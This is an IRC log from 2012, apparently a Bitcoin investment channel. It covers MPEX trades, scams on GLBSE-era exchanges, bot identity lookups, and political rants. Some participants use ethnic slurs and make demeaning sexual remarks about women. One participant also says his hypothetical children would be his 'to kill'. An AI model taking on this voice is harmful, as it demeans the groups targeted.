17:58:59 EskimoBob kakobrekla has a point. someoneshould archive btctalk Nov 18 17:59:01 I pm'd. Not used to web client, but normal clients refuse to connect to Freenode anymore. Using mobile tether for Internet. Nov 18 18:04:05 Someone come up with a Bitcoin-like decentralized solution for asset issuance/trading, yet? Nov 18 18:18:07 colored coins seem to be proof-of-worky Nov 18 18:18:35 and I think i recall one issure switching to them Nov 18 18:18:52 btctalk archive is nice but lots of important stuff is missing by now. Nov 18 18:19:16 well... it'd be for the future obviously Nov 18 18:19:49 smickles the big problem, of course, being that with no gatekeepers it'll be glbse v2.0 Nov 18 18:20:17 http://i.imgur.com/h1GZG.gif Nov 18 18:21:39 it has that risk and likelyhood, certainly Nov 18 18:21:55 hopefully there are some diamonds in the rough Nov 18 18:23:02 or Nov 18 18:23:09 ya but... disaster of commons. Nov 18 18:23:41 if you have loads of hdd space and access to unlimited bandwidth, even wget can build a archive of bitcointalk. Nov 18 18:23:49 hopefully, if it becomes popular, there will be a gatekeeper-cuirator sort out there Nov 18 18:24:18 how'd it be set ? Nov 18 18:25:01 sort've like the BBB in 'merica Nov 18 18:25:08 kakobrekla did you say milk ? http://polimedia.us/dtng/c/src/135325577648.jpg Nov 18 18:25:16 a list of known vetted businesses Nov 18 18:25:29 smickles look at what happens on the threads where scams are called out : a few shils yell loudly Nov 18 18:25:37 "average people" aren't interested to participate. Nov 18 18:25:52 as a result a fake sort of public agreement is created, for those foolish enough to credit it. Nov 18 18:28:47 it may be possible for a trusted elite to form who judge these things Nov 18 18:29:34 yeah, it may be possible. Nov 18 18:29:41 hehe Nov 18 18:29:44 bbl Nov 18 18:30:00 well, kakobrekla just opted out of the club Nov 18 18:30:02 ;) Nov 18 18:30:17 he's not married. you have to be married to be in the trusted elite. Nov 18 18:30:39 again, that can be done instantly. Nov 18 18:30:58 lmao Nov 18 18:31:04 ah, syntax ambiguity Nov 18 18:31:12 well not what i had in mind but i guess it could work as well Nov 18 18:31:23 make sure you film the baby coming out. Nov 18 18:31:30 ;> Nov 18 18:32:38 on that note, change bbl to brb. Nov 18 18:32:40 off i go. Nov 18 18:32:46 did namworld run BTC-BOND? Nov 18 18:34:39 wasn't amazingrando doing btc-bond ? Nov 18 18:35:12 that was bit-bond Nov 18 18:35:20 http://gifrific.com/wp-content/uploads/2012/07/Raccoon-Playing-With-Water-Sprinkler.gif Nov 18 18:35:21 IIRC Nov 18 18:35:24 o right you are Nov 18 18:35:39 i think namworld ran kraken fund passthrough on glbse Nov 18 18:52:00 DeathAndTaxes Posts: 8484 Nov 18 18:52:07 that dude wow. i want to hire him lol. Nov 18 18:53:54 damn, i think that SudoGhost might have met his match Nov 18 18:56:33 btw, reminding everyone : http://trilema.com/2012/voluntary-contracts-after-a-while/ Nov 18 18:56:45 there's a writing contest, 120 btc total prize fund Nov 18 18:56:58 4 to 6k word stories, three (four) sections. Nov 18 18:59:59 lol Nov 18 19:00:06 more than one writer's career started that way Nov 18 19:00:14 (they were less frank about it at the time however) Nov 18 19:14:24 B0g4r7 how goes ? Nov 18 19:15:08 [MPEX] [S.MPOE] 21722 @ 0.000501 = 10.8827 BTC [+] Nov 18 19:15:10 [MPEX] [S.MPOE] 16179 @ 0.00050102 = 8.106 BTC [+] Nov 18 19:20:33 mr. sickles Nov 18 19:20:36 errrr Nov 18 19:20:39 mr. smickles* Nov 18 19:28:40 thestringpuller: yo? Nov 18 19:54:45 [MPEX] [S.MPOE] 7521 @ 0.00050102 = 3.7682 BTC [+] Nov 18 19:54:47 [MPEX] [S.MPOE] 14529 @ 0.00050103 = 7.2795 BTC [+] Nov 18 20:38:18 New bitcoin service startup, please take a look! https://btcjam.com/listings/584 Nov 18 20:38:22 yeah Ukto's weexchange.co has started testing btc options trading Nov 18 20:43:11 hello everyone. has the idea been floated that bitpay bought all those calls on mpex? Nov 18 20:44:15 haven't heard it till now. Nov 18 20:44:18 have they ? Nov 18 20:49:50 [MPEX] [S.MPOE] 4450 @ 0.00050038 = 2.2267 BTC [-] Nov 18 20:56:04 not many people can buy that many calls Nov 18 20:56:22 why bitpay tho ? Nov 18 20:56:37 because they knew they were about to release the wordpress news Nov 18 20:56:41 o Nov 18 20:56:45 hm Nov 18 20:56:54 you think btc went up on wp news ? Nov 18 20:57:03 yes Nov 18 20:57:19 went up on 16th tho. Nov 18 20:57:35 mircea_popescu: so what are the stats on how many people regularly backup mpex? Nov 18 20:57:54 smickles i'm not keeping that close a track. Nov 18 20:57:56 why ? Nov 18 20:58:51 Lyspooner o right you are, announcement on the 15th huh Nov 18 20:59:27 i think it is probably a coincidence Nov 18 20:59:53 mircea_popescu: just curious Nov 18 21:00:22 Lyspooner the trades are pretty old tho. Nov 18 21:00:32 then again, i guess it's possible they knew on the 5th or w/e Nov 18 21:00:32 o when were they Nov 18 21:00:40 ok Nov 18 21:01:08 did your bot limit them to volume per strike? Nov 18 21:01:10 Nov 05 12:18:09 [MPEX] [O.BTCUSD.C060T] 1000 @ 0.55667391 = 556.6739 BTC [-] Nov 18 21:01:15 hey, right on. the 5th Nov 18 21:01:22 ;;ident doffx Nov 18 21:01:22 Nick 'doffx', with hostmask 'Doffx!~doff@c-76-28-215-172.hsd1.wa.comcast.net', is not identified. Nov 18 21:01:30 yes bot only sells 6k of any mpsic Nov 18 21:01:37 ;gpg doffx Nov 18 21:01:46 ;;gpg doffx Nov 18 21:01:46 Error: The "GPG" plugin is loaded, but there is no command named "doffx" in it. Try "list GPG" to see the commands in the "GPG" plugin. Nov 18 21:01:55 Oops I suck at this Nov 18 21:02:00 what are you trying to do ? Nov 18 21:02:03 I just want my key info Nov 18 21:02:07 ;;ident Nov 18 21:02:07 You are not identified. Nov 18 21:02:20 Ahh I need to ident first it seems Nov 18 21:02:26 well if not, Nov 18 21:02:28 ;;rated doffx Nov 18 21:02:28 You have not yet rated user doffx Nov 18 21:02:31 bah Nov 18 21:02:37 ;;getrating doffx Nov 18 21:02:37 WARNING: Currently not authenticated. User Doffx, rated since Sat Apr 21 13:07:28 2012. Cumulative rating 3, from 2 total ratings. Received ratings: 2 positive, 0 negative. Sent ratings: 3 positive, 0 negative. Details: http://bitcoin-otc.com/viewratingdetail.php?nick=Doffx Nov 18 21:03:14 There is a way to see my key id ive seen smickles do it before Nov 18 21:04:12 I got it anyhow. Nov 18 21:04:23 Too lazy to verify even though it takes 5 secs Nov 18 21:07:54 Doffx: key? Nov 18 21:07:58 ;;gpg info smickles Nov 18 21:07:59 User 'smickles', with keyid EA62D7CEB2450C3F, fingerprint 96ACCA7C3B09EC61B0A6D7F9EA62D7CEB2450C3F, and bitcoin address 12NjnZTVeTJ3g5C7BqfS2aQ2rLkmwiqVz6, registered on Mon Jun 20 12:24:35 2011. http://bitcoin-otc.com/viewgpg.php?nick=smickles . Currently authenticated from hostmask smickles!~smickles@mostofmany.com . Nov 18 21:08:30 mircea_popescu: re: those calls, didn't we calc their profit at >13usd? Nov 18 21:08:46 i think. Nov 18 21:08:52 Ahh I was missing the info part, see I was close Nov 18 21:08:59 was an entire set. Nov 18 21:10:58 sir mircea_popescu Nov 18 21:11:06 teach me romanian for 100 btc Nov 18 21:12:00 haha i only teach girls. Nov 18 21:12:51 teach me about girls for 100 btc Nov 18 21:12:52 lol Nov 18 21:13:27 lol what do you want to know ? Nov 18 21:14:28 how do you approach them when you aren't a millionaire like yourself? Nov 18 21:14:41 coolly. Nov 18 21:14:44 by walking, usually Nov 18 21:15:03 ;D Nov 18 21:15:07 lol Nov 18 21:15:23 if its not on the net its worthless. Nov 18 21:15:27 You dont need a million dollars to get women Nov 18 21:15:37 you only need 50 Nov 18 21:15:59 well given that a majority of people are born poor Nov 18 21:16:04 it'd seem money don't enter into it. Nov 18 21:17:02 but since we're talking, i just finished a new article! http://trilema.com/2012/this-marriage-thing/ Nov 18 21:17:06 Arent there like a million dating sites now anyhow? Seems like that should make it easy to hook up these days. Nov 18 21:17:40 Ive been married 12 years so dont know what dating is anymore, but before the wife I had no trouble getting women without much money. Nov 18 21:18:03 Doffx dating is this thing whereby women are desperate for male attention and will literally do anything whatsoever. Nov 18 21:18:09 The women I married made about 4 times what I did and still makes double now. Nov 18 21:18:34 That sound like what I remember as well mircea_popescu. Nov 18 21:18:38 hm Nov 18 21:19:01 Furthermore no man could buy more than one woman-cow. < poligamy? Nov 18 21:19:15 Hahaha Nov 18 21:19:22 kakobrekla well not in europe at any rate. Nov 18 21:19:29 eh? Nov 18 21:19:35 vilest of crimes i think Nov 18 21:19:41 arguably, but way up there with paricide Nov 18 21:20:13 it happend in yurop as well afaik Nov 18 21:20:17 and its still happenin Nov 18 21:20:20 not on a large scale Nov 18 21:20:26 but you cant say it does not Nov 18 21:20:33 well we're discussing culture and norms not what's happening Nov 18 21:20:49 so you are theoretical and not practical here Nov 18 21:20:57 in that sense yea Nov 18 21:22:15 i always say, "Hey bahybehy, what high school do you go to?" Nov 18 21:24:17 seeing how it's the context not the message, that may even work. Nov 18 21:24:19 does it ? Nov 18 21:25:04 not every time Nov 18 21:25:27 mostly Nov 18 21:25:51 good enough then Nov 18 21:33:24 gay movement strived once to abolish marriage completely Nov 18 21:33:48 then they decided rather to embrace, extend &extinguish Nov 18 21:35:01 this is like let me find the gif again Nov 18 21:35:13 http://i.imgur.com/ujQon.gif Nov 18 21:35:18 the whale of marriage dies of old age Nov 18 21:35:26 not cause some birdies flop around. Nov 18 21:38:30 mircea_popescu: do you have any kids? Nov 18 21:38:39 nope Nov 18 21:38:50 you would use them as child slaves if you had any Nov 18 21:39:00 :) Nov 18 21:39:34 i don't really intend to have any in a jurisdiction that has difficulty with the notion that they're mine to kill if it comes to it. Nov 18 21:42:44 good luck to find such a jurisdiction Nov 18 21:43:31 what do i care ? Nov 18 21:43:40 it's the jurisdiction's job. Nov 18 21:44:20 you sound like a negro mother Nov 18 21:44:29 i guess some people will be enlightened by your decision to not procreate (especially if pr girl has the same opinion) Nov 18 21:44:40 "I brought you into this world, I can take you out of it" Nov 18 21:45:32 jurov most girls i know have the same opinion. Nov 18 21:45:58 thestringpuller you know, to this day the us won't declare that they won't use nuclear weapons. apparently it is necessary for security. Nov 18 21:46:12 well.. fuck me if i see how you can educate children that know for a fact it can't come to their neck. Nov 18 21:46:38 in other news, http://ist1-2.filesor.com/media/image/3/7/0/1/37010/3/f/c/8/ratingchart.jpg Nov 18 21:48:15 like we have any usuable nukes Nov 18 21:48:26 [MPEX] [S.MPOE] 18421 @ 0.00050103 = 9.2295 BTC [+] Nov 18 21:48:41 nuclear weapons are lame Nov 18 21:48:58 be that as it may, the principle stands. Nov 18 21:49:38 you ever play metal gear? Nov 18 21:49:50 that is my stance on the whole nuclear proliferation thing Nov 18 21:50:28 how will one learn voluntary contract if one was educated with knife on their neck? Nov 18 21:50:54 i see a bit of cognitive dissonance Nov 18 21:51:09 why ? Nov 18 21:51:56 supposed "adults" who grew up with no actual experience of their own death typically behave like overgrown children. Nov 18 21:52:09 evidence? Nov 18 21:52:16 america Nov 18 21:52:34 i mean murica Nov 18 21:53:19 ya, jurov baby this is like "please write a 500 word summary of the history of the world - use examples" Nov 18 21:53:32 man Nov 18 21:53:38 this is why I dont work on diablominer Nov 18 21:53:43 I started doing a small fix Nov 18 21:53:49 I ended up writing pretty much all of it Nov 18 21:53:55 lol Nov 18 21:54:21 mymindisfulloffuck.jpg Nov 18 21:54:55 50/50 is like the best dramedy I've seen in a decade Nov 18 21:57:37 whatever. my opinion people were always like overgrown children. but there were strong expectations from around society and one had to conform Nov 18 21:57:44 now no one gives a fuck Nov 18 21:58:22 society = people Nov 18 21:58:25 people = wrong Nov 18 21:59:17 jurov one still has to conform. Nov 18 22:01:15 yes. just that the force is more subtle Nov 18 22:01:26 right. Nov 18 22:02:20 [MPEX] [O.BTCUSD.P190T] 1000 @ 0.77867002 = 778.67 BTC [-] Nov 18 22:02:22 [MPEX] [O.BTCUSD.P200T] 1000 @ 0.88032553 = 880.3255 BTC [-] Nov 18 22:02:31 [MPEX] [O.BTCUSD.P170T] 1000 @ 0.579474 = 579.474 BTC [-] Nov 18 22:02:32 [MPEX] [O.BTCUSD.P180T] 1000 @ 0.67819874 = 678.1987 BTC [-] Nov 18 22:02:48 [MPEX] [O.BTCUSD.P160T] 1000 @ 0.48333127 = 483.3313 BTC [-] Nov 18 22:32:57 updated: http://blog.smickles.com/bitcoin/bitcoin-finance/a-good-month-for-s-dice-shareholders-in-the-making/ Nov 18 22:35:06 it lost moar ? Nov 18 22:35:24 a little, someone was a bit lucky (and bragging about it) Nov 18 22:36:02 someone selling puts Nov 18 22:36:24 i'm having some mango icecream in their honor Nov 18 22:42:02 fuckin jewtube Nov 18 22:42:11 been searching for some vid for like half an hour Nov 18 22:42:16 i know its there. Nov 18 22:42:35 video wants to be free Nov 18 22:43:33 ill give it another 7 minutes Nov 18 22:51:02 well? Nov 18 22:51:12 maybe im onto something Nov 18 22:51:16 lol Nov 18 22:51:26 aha Nov 18 22:51:37 yay! Nov 18 22:51:41 its here Nov 18 22:53:17 http://www.youtube.com/watch?v=k8qOlDSQ_1c&feature=youtu.be&t=3m6s Nov 18 22:53:25 i was looking for these 6 seconds. Nov 18 22:53:52 hum Nov 18 22:53:54 broken link Nov 18 22:54:27 hm works in chrome but not opera Nov 18 22:54:29 whatever. Nov 18 23:10:42 diggity damn, https://bitcointalk.org/index.php?topic=113708.msg1343619#msg1343619 Nov 18 23:11:08 harsh shit for usagi trying to get back in the game Nov 18 23:11:37 i wasnt expecting him to get back under same handle Nov 18 23:13:55 http://www.reddit.com/r/Bitcoin/comments/13eq5g/this_was_a_bit_unexpected_today_i_found_out_that/c73c32n Nov 18 23:14:31 lol Nov 18 23:36:28 i wasnt expecting him to get back under same handle++ Nov 18 23:36:52 in other news, http://www.livescience.com/22824-penis-head-fish-discovered.html Nov 18 23:46:38 well, mircea_popescu i have about 1/10th of it written, so far, not much time devoted to the writing Nov 18 23:49:29 [MPEX] [S.MPOE] 30900 @ 0.00050146 = 15.4951 BTC [+] Nov 18 23:50:43 https://bitcointalk.org/index.php?topic=74216.msg1343759#msg1343759 Nov 18 23:50:55 s2cm news^ Nov 19 00:04:22 hm, i'm slowly abadoning hope that the glbse passthroughs will ever be resolved Nov 19 00:05:02 next option for coinbr seems to buy eurorail ticket and make talks about mpex/coinbr everywhere Nov 19 00:05:16 although i'm horrible in convincing people :/ Nov 19 00:05:30 maybe you need a pr girl Nov 19 00:05:40 hehe Nov 19 00:06:15 next option for coinbr seems to buy eurorail ticket and make talks about mpex/coinbr everywher << i like this idea Nov 19 00:06:17 hehe... don't happen to have gf, and no one will do that for free Nov 19 00:06:38 gf ?! i thought you swung the other way. Nov 19 00:06:46 nor bf Nov 19 00:07:20 a couple years ago i made a contest on my blog. people could comment with their address, get a stack of business card sized stickers Nov 19 00:07:35 then if they sent pictures with them put up somewhere they'd get some moneyz Nov 19 00:07:45 lemme see if i can dig it up Nov 19 00:08:25 i was trying to be a OVB financial agent some 2yrs ago and i realized i'm really horrible at sales Nov 19 00:09:06 http://polimedia.us/dtng/c/res/3709.html Nov 19 00:09:10 that's the thread with ppl posting pics Nov 19 00:15:45 dunno. i have talked with some of my entrepreneur friends and even got a response like "you look like typical coder, they don't do this... shouldn't you rather find a job?" Nov 19 00:15:54 asshole Nov 19 00:16:13 but if that's really an impression i make to ppl... :/ Nov 19 00:16:40 what are you trying to do exactly ? Nov 19 00:17:52 to have some meaningful volume on coinbr Nov 19 00:19:47 well that's not exactly something for cold calling is it ? Nov 19 00:20:19 :D Nov 19 00:20:42 nor distributing stickers Nov 19 00:22:00 well that was for the blog obviously. Nov 19 00:32:07 but listen jurov, i think you being or not being a salesman has very little to do with it. Nov 19 00:32:45 it's easy to forget what a horrible time for btc finance we're going through. in the past THREE months pirate, hasking, nefario, harnett and a dozen more idiots raped the innocent public quite raw. Nov 19 00:33:04 i'd be much surprised if fifty of the few hundred/coupla k glbse "investors" are still in the market today. Nov 19 00:33:39 im in the market but theres not much to play on really Nov 19 00:35:08 on the other hand, i raised 65BTC via btcjam already... that's much more coinbr has ever seen Nov 19 00:35:34 i wonder how many of those will ever get repaid. Nov 19 00:35:34 so i guess at least some bitcoins are around Nov 19 00:35:52 at least 65 of em Nov 19 00:35:58 haha Nov 19 00:36:45 well i have a few 100 btc players since we are talking bout it Nov 19 00:37:08 jurov may also be a matter of process Nov 19 00:37:14 guy lands on your site. what's the landing page ? Nov 19 00:38:05 "about" text Nov 19 00:38:48 make a proper register button Nov 19 00:39:15 who were we discussing earlier, bitpay ? Nov 19 00:39:18 https://bitpay.com/ look at their page Nov 19 00:39:30 slut, bitcoin, coupla words and a large green button Nov 19 00:39:46 no boobs. Nov 19 00:39:57 maybe upper side tops Nov 19 00:39:59 no nips Nov 19 00:40:02 okay, can do. but i suspect something else too. quite a number of peeps registered, but never sent anything Nov 19 00:40:10 o ? Nov 19 00:40:17 i rarely get that. Nov 19 00:40:35 well i was expressing that in a sad tone. sorry it didnt come through. Nov 19 00:41:09 At least, the stupid-wealthy investors appear to be out. I don't think anyone will be offering me 1kBTC without even having terms established for a long while... Nov 19 00:41:25 lol Nov 19 00:41:32 say wut ?! Nov 19 00:42:26 Or maybe they bought in early and everything after making back the $5k they spent to acquire 10kBTC+ was a gamble for amusement. Nov 19 00:42:59 this boggles the mind. do you imagine anyone is giving you money ? why ? Nov 19 00:43:12 Soon after Pirate defaulted, I was offered 10kBTC "when" he returns it. No promissory note or anything. People were ridiculously trusting during Pirate's reign. Nov 19 00:43:43 yes, inexplicably at some point you had credit. Nov 19 00:43:55 then again, a bunch of idiots had credit at some point, through the sheer blessing of "being there". Nov 19 00:44:00 Now, people want to know "what's my money being used for?" "Where's the notarized promissory note?" "Where do you work?" -- you have to actually work for money. :( Nov 19 00:44:36 kakobrekla is this a troll ? Nov 19 00:44:48 lol good question Nov 19 00:45:05 Naw. Nov 19 00:45:12 proove it Nov 19 00:45:37 I've had MPOE-PR on ignore since the second time he/she/it PMd me back in something like May. Nov 19 00:45:39 well seeing how the dilemma is troll or idiot, seems hardly worth proving. Nov 19 00:50:00 http://www.iwearyourshirt.com/ i wonder if something like this'd be worth doing for bitcoin Nov 19 00:53:37 kakobrekla: is there MT4 for linux? Nov 19 00:53:49 i dont think so Nov 19 00:54:04 vm is your friend Nov 19 00:54:33 but whai! Nov 19 00:55:00 cause people are stupid. Nov 19 00:55:09 didnt you see that jewtube link? Nov 19 00:56:38 I SAW ALL OF THEM Nov 19 00:56:41 except that one! Nov 19 00:59:44 ;;lucky poliboobs.jpg Nov 19 00:59:44 http://www.miamiherald.com/news/politics/ Nov 19 00:59:59 mircea_popescu: you've lost the top spot! Nov 19 01:00:18 ... to the miami herald political page? Nov 19 01:00:59 aww! Nov 19 01:01:10 ;;lucky poliboobs Nov 19 01:01:11 http://politits.blogspot.com/ Nov 19 01:01:15 heh Nov 19 01:01:32 a, you have to do img search Nov 19 01:01:35 not plain search Nov 19 01:02:30 what are obama, paul and blair doing there? Nov 19 01:03:43 bin laden, bush, clinton there too.. veritable who's who Nov 19 01:04:00 thatcher isn't there... suspicion confirmed Nov 19 01:05:44 huh ? Nov 19 01:06:19 nor hillary Nov 19 01:22:09 [MPEX] [S.MPOE] 27290 @ 0.00050198 = 13.699 BTC [+] Nov 19 01:22:50 what a tease Nov 19 01:54:08 i still can't quite wrap my head around it, was kludge just here whining about how you have to work to get btc now ? Nov 19 01:54:43 seemed like it Nov 19 01:55:45 teh interwebs be boundless in their bounty. Nov 19 02:14:52 i will make a fart joke for 1 btc Nov 19 02:14:54 jk Nov 19 02:15:11 mircea_popescu: would you invest in a film via btc? Nov 19 02:16:53 take dat as a no ;) Nov 19 02:22:04 lol Nov 19 02:22:14 i invested in a few films, but never wihtout knowing the producers Nov 19 02:22:18 and sampling the stars. Nov 19 02:23:06 that's so hollywood "sampling the stars" Nov 19 02:23:15 "I will give you the part for 10 blow jobs" Nov 19 02:34:43 mircea_popescu: you should invest in fringe science Nov 19 02:35:15 what's that ? Nov 19 02:39:07 crazy futuristic science Nov 19 02:39:09 like time travel Nov 19 02:39:17 or interdimensional travelling Nov 19 02:45:04 meh. Nov 19 02:46:21 science never fails Nov 19 02:52:51 or magnets Nov 19 03:02:56 "I will give you the part for 10 blow jobs" << that;s really not how it works. Nov 19 03:02:57 How do they work? Nov 19 03:03:03 :P Nov 19 03:03:04 it's not a count issue. it's a matter of making sure the girl is personable. Nov 19 03:03:48 "Other related people (smickles) are behaving quite good, and we had useful discussions over support email." Nov 19 03:03:50 the man says. Nov 19 03:03:56 did they manage to produce an explanation in the end ? Nov 19 03:04:02 not yet Nov 19 03:04:12 urlpls Nov 19 03:04:14 why do scammers always behave in this particular manner. Nov 19 03:04:20 https://bitcointalk.org/index.php?topic=50817.msg1343748#msg1343748 Nov 19 03:04:52 o im sorry kakobrekla, were you asking for personable girl url ? Nov 19 03:05:18 well now that you mentioned it... Nov 19 03:05:52 http://polimedia.us/dtng/c/src/135328008984.jpg i would call this personable. Nov 19 03:06:33 i would not disagree. Nov 19 03:07:15 hallo dedis18 Nov 19 03:07:20 How am I considering that article of clothing a skirt? Nov 19 03:07:48 what else is it, a hat ? Nov 19 03:07:59 Maybe it's just a headband, and she's wearing it wrong Nov 19 03:08:10 any belt wider than two inches made of textile material counts as a skirt if around the waist. Nov 19 03:08:31 rule #34857-F Nov 19 03:14:04 btw smickles, the thing about blogging is that you always suck at first Nov 19 03:14:21 but if you manage to stick with it for a few years, writing daily or so, you'll notice impressive improvement. Nov 19 03:15:57 that last line holds true for most of stuff Nov 19 03:17:00 sex ? Nov 19 03:17:15 it does hold true for oral and anal, if you're a girl. anal especially. **** BEGIN LOGGING AT Mon Nov 19 04:50:59 2012 Nov 19 04:55:53 mircea_popescu: did bitvps stop issuing monthly reports? Nov 19 04:56:02 not afaik ? Nov 19 04:57:43 their website stop at july, the listing on mpex says that they may also be roported on bitcointalk, but i can't find them Nov 19 04:58:10 hm Nov 19 04:58:14 better ask rg about this Nov 19 04:58:16 ;;seen rg Nov 19 04:58:17 rg was last seen in #bitcoin-assets 1 week, 2 days, 1 hour, 12 minutes, and 36 seconds ago: wow, i guess you showed us. Nov 19 04:58:22 mm Nov 19 04:58:31 ;;later tell rg mircea_popescu: did bitvps stop issuing monthly reports? Nov 19 04:58:32 The operation succeeded. Nov 19 04:58:37 i pm'd him and grubles Nov 19 04:59:40 the've kept up on dividends tho Nov 19 05:00:40 any answer ? Nov 19 05:01:07 not yet, it's only been a couple of hours or so Nov 19 05:02:03 a ok **** BEGIN LOGGING AT Mon Nov 19 06:18:59 2012 Nov 19 06:30:32 [MPEX] [O.BTCUSD.C130T] 1 @ 0.08387781 BTC [-] Nov 19 07:05:38 ;;view Nov 19 07:05:38 #11746 Sat Nov 17 17:08:46 2012 smickles SELL 900.0 Trilema Credits @ 0.1 BTC (None) Nov 19 07:05:42 ^for serious Nov 19 07:07:13 man, the robots love my blog Nov 19 07:07:34 they've visited over 200 times in just a couple of days Nov 19 07:10:55 and when do we have to stop suffering posts like this: https://bitcointalk.org/index.php?topic=126617.msg1344102#msg1344102 Nov 19 07:11:19 " I'd say we got 2 to 4 months tops to do something about the 21 million bit coin cap" Nov 19 07:14:36 oh Nov 19 07:14:43 s/have to/get to/ Nov 19 07:15:58 So I've decided to get into mining with a couple of decent laptops Nov 19 07:16:01 lol /thread Nov 19 07:19:49 https://bitcointalk.org/index.php?topic=126630.msg1344347#msg1344347 Nov 19 07:19:51 mircea_popescu: ^ Nov 19 07:19:53 damn Nov 19 07:20:41 wtf ?! that actually works ? Nov 19 07:20:42 *disclaimer, i'v not, at all, looked into the authenticity of those claims Nov 19 07:21:00 wild Nov 19 07:21:07 afaik stuff only propagates if it's positive Nov 19 07:21:35 "We will never end poverty if we don't tackle climate change. It is one of the single biggest challenges to social justice today," Kim told reporters on a conference call on Friday. Nov 19 07:21:37 jesus fuck ? Nov 19 07:21:55 who put those fuckwits there. i don't want to end poverty and i piss on social justice omg wtf Nov 19 07:21:55 well, kim is a dumbass Nov 19 07:22:06 who is kim? Nov 19 07:22:15 some korean i guess Nov 19 07:22:16 can i short kim? Nov 19 07:22:38 actually... Nov 19 07:22:39 i dunno, but if you shoot kim... Nov 19 07:22:48 can I pump and dump kim :) Nov 19 07:22:54 anyway. kim is the president of the world bank Nov 19 07:23:02 :o Nov 19 07:23:03 which i dunno how the fuck he got Nov 19 07:23:08 http://www.huffingtonpost.com/2012/11/18/world-bank-climate-change-report_n_2156082.html sauce Nov 19 07:23:15 I guess i am shorting kim Nov 19 07:23:49 ya know Nov 19 07:23:59 there is one surefire way to end poverty Nov 19 07:24:01 As the first scientist to head the World Bank, Kim has pointed to "unequivocal" scientific evidence for man-made climate change to urge countries to do more. Nov 19 07:24:01 Kim said 97 percent of scientists agree on the reality of climate change. Nov 19 07:24:18 ignore climate change, bake the planet, kill all humans Nov 19 07:24:23 dude, 97% of ppl called "scientist" in the media are monkeys. Nov 19 07:24:33 smickles known as the poincarre argument. Nov 19 07:25:03 "the end of human suffering can never be a policy goal because the easiest way to achieve it is to just kill everyone" Nov 19 07:25:34 woah, man, i'm a bit drunk for that right nao Nov 19 07:25:56 So I get it the common good interest fews... Nov 19 07:25:56 call it the skynet argument Nov 19 07:26:16 Namjies there is no "common good" other than in the populist discourse. Nov 19 07:26:18 ;;ident Namjies Nov 19 07:26:18 Nick 'Namjies', with hostmask 'Namjies!~BTC-Minin@modemcable065.181-83-70.mc.videotron.ca', is identified as user Namjies, with GPG key id F2758D83EEEDE453, key fingerprint F12DE6B4E1EF26F5768BE918F2758D83EEEDE453, and bitcoin address 1Namjies9JeJ4ugCzjkAj6dbaWrtjAFKCk Nov 19 07:26:21 anyone speaking to the common good is a fraud. Nov 19 07:26:29 no wai, using your otc name? Nov 19 07:26:57 i like the videotron.ca part, he's like a hardcore gamer :D Nov 19 07:27:30 smickles : poincarre gets precedence cause of being french, president and 1800s Nov 19 07:27:59 I saw that when we tried to play monopoly, thought it was bad ass just from the form of it (aesthetics) Nov 19 07:28:14 I'm not saying what many you hear ain't bollocks, especially when it comes to "facts" about the environments, people's condition, etc. being easy to check out as false. Nov 19 07:29:04 Namjies how about forcing everyone to move to TOXIC mercury-based lighting under the pretext of "helping the environment" Nov 19 07:29:14 tho it doesn't help it, it just makes poor countries unable to export lightbulbs Nov 19 07:29:25 which were exactly at their technological level, a good stepping stone to development Nov 19 07:29:52 at least it's cheaper if they last as long as they claim for the end user Nov 19 07:30:04 "scientists agree". fuck them, 97% of them have nothing to do with science, they just agree and get funding and agree more and get more funding. Nov 19 07:30:08 (throw a couple of commas in there will you) Nov 19 07:30:13 smickles except they don't last longer. Nov 19 07:30:14 Yeah, what I'm saying, not do that if you don't believe it's going to help. Nov 19 07:30:33 they last less, and then they create piles of mercury. Nov 19 07:30:35 plus the light from those toxic cfl things is awful and depressing Nov 19 07:30:43 and yellowish Nov 19 07:30:52 I can use mercury tho Nov 19 07:30:53 im still using fillamets Nov 19 07:30:57 at least for fun Nov 19 07:30:57 I'm talking merely about avoiding of negatively impacting people in general when you can and are aware of it. Nov 19 07:30:59 and bought massive stocks Nov 19 07:31:10 Namjies ya well, nobody's arguing about that. Nov 19 07:31:25 yeah i stocked up on good lightbulbs, i learned my lesson, made a killing on regular flow toliets Nov 19 07:31:28 Well [00:21] who put those fuckwits there. i don't want to end poverty and i piss on social justice omg wtf Nov 19 07:31:32 pigeons srsly ? Nov 19 07:31:34 fuckit, screw this planet as hard as we can, we need to get off this rock anyway Nov 19 07:31:39 Could be misinterpreted Nov 19 07:31:57 Namjies i guess so. but i don't want to hurt them either, i just don't want to end poverty. that's all. Nov 19 07:32:17 i am against all action when that action doesn't have a moral and legitimate profit reason. Nov 19 07:32:22 mircea_popescu: yes, where i live about 15 years ago they mandated "low flow" toliets that take 2 flushes, and the old ones are selling for several hundred dollar premiums and i've sold out Nov 19 07:32:29 not the fuckwits, they might well be. Both side tend to exaggerate and pull statistics out of nowhere. Nov 19 07:32:33 pigeons heh. sounds like ny. Nov 19 07:32:34 fear of poverty must motivate some good that wouldn't have otherwise arisin Nov 19 07:32:47 north carolina Nov 19 07:32:53 fuck NC Nov 19 07:33:03 it was a bad place to live Nov 19 07:33:09 pretty much the only thing i like about romania is that none of this shit took any hold (yet) Nov 19 07:33:32 there's a ban on fillament lightbulbs ? they're sold in the stores. fuck you, eu. Nov 19 07:33:40 there was a ban on exporting gas to serbia ? Nov 19 07:33:49 everyone was doing daily trips there to sell gas. Nov 19 07:33:56 that's ballzy Nov 19 07:34:02 not rly. Nov 19 07:34:11 yeah in usa regular lightbulbs can't be sold starting some date in the future, i dont know if thats changed or what Nov 19 07:34:25 there's a ban on fillament lightbulbs in Europe? Nov 19 07:34:28 mircea_popescu: natural gas? Nov 19 07:34:30 yeah. Nov 19 07:34:37 smickles no, gasoline. car fuel. Nov 19 07:34:43 oh, nvm then Nov 19 07:34:58 funny enough tho, diesel was at a premium (cause of tanks) Nov 19 07:35:02 but most people moved gas. Nov 19 07:35:07 Odd... Nov 19 07:35:53 The first types to go are non-clear (frosted) bulbs, which are off the market since September 2009. Also from September 2009 clear bulbs over 100W were made of more efficient types. This limit was moved down to lower wattages, and the efficiency levels raised by the end of 2012 Nov 19 07:36:06 you mean when there is market intervention there are consequences and unintented consequences? Nov 19 07:36:09 i am currently basking in the light of two 200W clear fillament lightbulbs Nov 19 07:37:25 and actually, inspired by this discussion i think ima buy a few more tomorrow. Nov 19 07:37:33 Well I don't particularly like fillament lightbulbs but heck, I don't see a problem with them. Nov 19 07:37:50 bitbulb.com, coming soon to mpex Nov 19 07:37:53 lol Nov 19 07:38:12 these nitwits. Nov 19 07:38:32 every time the girl blasts some dubious operation to hell there's a string of bs "attacks" on 